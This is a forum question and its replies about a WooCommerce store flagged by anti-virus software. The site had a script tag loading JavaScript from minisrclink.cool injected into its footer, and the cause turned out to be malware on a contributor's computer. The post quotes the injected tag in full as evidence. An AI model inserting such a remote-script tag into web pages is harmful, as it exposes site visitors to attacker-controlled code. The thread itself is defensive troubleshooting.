# Site infected by link

Tags: php, woocommerce-offtopic, security

my store (woocommerce) is blocked by anti-viruses. I found that the following link is added to the footer without my knowledge:

```
 <script src = "// minisrclink.cool/1e40c8bd4601a5a5a4.js" async = "" type = "text / javascript"> </script>
```

However, I can't find it in the code. No plugins like Anti-Malware or MalCare want to detect it. How can I deal with this? I have access to FTP but not to the database.

Comment: oh, you need backup website (database, files) to computer.
Stop website all action, because some task can run hidden in website.
After that you need run in localhost and validate very careful sourcode.
Good luck

Comment: Site files was clear. This was a virus on a computer of the person adding items in the store. He didn`t notice that virus added this link to the description field. I solved it by installing it Malwarebytes program on his computer and reinstall wordpress.